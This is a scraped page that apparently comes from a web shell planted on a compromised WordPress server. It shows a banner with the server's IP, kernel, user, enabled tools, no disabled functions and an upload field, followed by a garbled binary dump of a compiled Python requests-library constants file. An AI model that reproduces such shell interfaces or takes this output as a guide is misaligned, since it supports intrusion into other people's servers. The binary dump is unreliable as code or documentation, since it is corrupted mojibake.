Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8 [1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560 [2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85 [3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50 [4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13 [5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
| Server IP : 94.177.8.99 / Your IP : 216.73.217.165 Web Server : Apache/2.4.58 (Ubuntu) System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /nuitka/eggshell.build/ |
Upload File : |
�� �items�.��3 �/Returns an internal sequence dictionary update.�.�K .�� �__len__�.�� �len�.��
�fileno�.�� �io�.�� �UnsupportedOperation�.�� �os�.�� �fstat�.�� �st_size�.�� �b�.�� �mode�.�� �warnings�.�� �warn�.��, X% Requests has determined the content-length for this request using the binary size of the file: however, the file has been opened in text mode (i.e. without the 'b' flag in the mode). This may lead to an incorrect content-length. In Requests 3.0, support will be removed for files in text mode.�.�� �FileModeWarning�.�� �o�.�� �tell�.�� �builtins��OSError���h��.�� �seek�.�� �total_length�.�� K K��.�� �max�.�� �netrc�.�� h�NetrcParseError���.�h.�� �NETRC_FILES�.�� �path�.�� �
expanduser�.�� �~/{}�.��
�exists�.�� �urlparse�.�� C:�.�� �str�.�� �ascii�.��
�netloc�.�� �split�.�� �authenticators�.�K.�K.��* h�ImportError���h�AttributeError�����.��? �;Returns the Requests tuple auth for a given url from netrc.�.�� �name�.�� �
basestring�.�� �<�.�� J����.�� �>�.�� �basename�.��4 �0Tries to guess the filename of the given object.�.��* �&too many values to unpack (expected 2)�.�� �archive�.�� �/�.��
�member�.�� �zipfile�.�� �
is_zipfile�.�� �ZipFile�.�� �namelist�.�� �tempfile�.�� �
gettempdir�.�� �join�.�� h7��.�� �extract�.�� h��.�� �extracted_path�.��� ��Replace nonexistent paths that look like they refer to a member of a zip
archive with the location of an extracted copy of the target, or else
just return the provided path unchanged.
�.�� �bytes�.��/ �+cannot encode objects that are not 2-tuples�.�� �OrderedDict�.��� X� Take an object and test to see if it can be represented as a
dictionary. Unless it can not be represented as such, return an
OrderedDict, e.g.,
::
>>> from_key_val_list([('key', 'val')])
OrderedDict([('key', 'val')])
>>> from_key_val_list('string')
ValueError: cannot encode objects that are not 2-tuples
>>> from_key_val_list({'key': 'val'})
OrderedDict([('key', 'val')])
:rtype: OrderedDict
�.�� �Mapping�.��� X� Take an object and test to see if it can be represented as a
dictionary. If it can be, return a list of tuples, e.g.,
::
>>> to_key_val_list([('key', 'val')])
[('key', 'val')]
>>> to_key_val_list({'key': 'val'})
[('key', 'val')]
>>> to_key_val_list('string')
ValueError: cannot encode objects that are not 2-tuples.
:rtype: list
�.�� �_parse_list_header�.�� h�slice���J����NN��R�.�� hMNKN��R�.�� �"�.�� �unquote_header_value�.�� hMKJ����N��R�.��
�result�.��
�append�.�� X Parse lists as described by RFC 2068 Section 2.
In particular, parse comma-separated lists where the elements of
the list may include quoted-strings. A quoted-string could
contain a comma. A non-quoted string could have quotes in the
middle. Quotes are removed automatically after parsing.
It basically works like :func:`parse_set_header` just that items
may appear multiple times and case sensitivity is preserved.
The return value is a standard :class:`list`:
>>> parse_list_header('token, "quoted value"')
['token', 'quoted value']
To create a header from the :class:`list` again, use the
:func:`dump_header` function.
:param value: a string with a list header.
:return: :class:`list`
:rtype: list
�.�� �=�.�� hYK��.��e X^ Parse lists of key, value pairs as described by RFC 2068 Section 2 and
convert them into a python dict:
>>> d = parse_dict_header('foo="is a fish", bar="as well"')
>>> type(d) is dict
True
>>> sorted(d.items())
[('bar', 'as well'), ('foo', 'is a fish')]
If there is no value for a key it will be `None`:
>>> parse_dict_header('key_without_value')
{'key_without_value': None}
To create a header from the :class:`dict` again, use the
:func:`dump_header` function.
:param value: a string with a dict header.
:return: :class:`dict`
:rtype: dict
�.�� hMNKN��R�.�� �\\�.�� �replace�.�� �\\��\���.��
�\"�hR��.��� ��Unquotes a header value. (Reversal of :func:`quote_header_value`).
This does not use the real unquoting but what browsers are actually
using for quoting.
:param value: the header value to unquote.
:rtype: str
�.�� �value�.�� �cookie_dict�.��� ��Returns a key/value dictionary from a CookieJar.
:param cj: CookieJar object to extract cookies from.
:rtype: dict
�.�� �cookiejar_from_dict�.��� ��Returns a CookieJar from a key/value dictionary.
:param cj: CookieJar to insert cookies into.
:param cookie_dict: Dict of key/values to insert into CookieJar.
:rtype: CookieJar
�.��� ��In requests 3.0, get_encodings_from_content will be removed. For more information, please see the discussion on issue #2266. (This warning should only appear once.)�.�� �DeprecationWarning�.�� �re�.�� �compile�.�� �I�.��'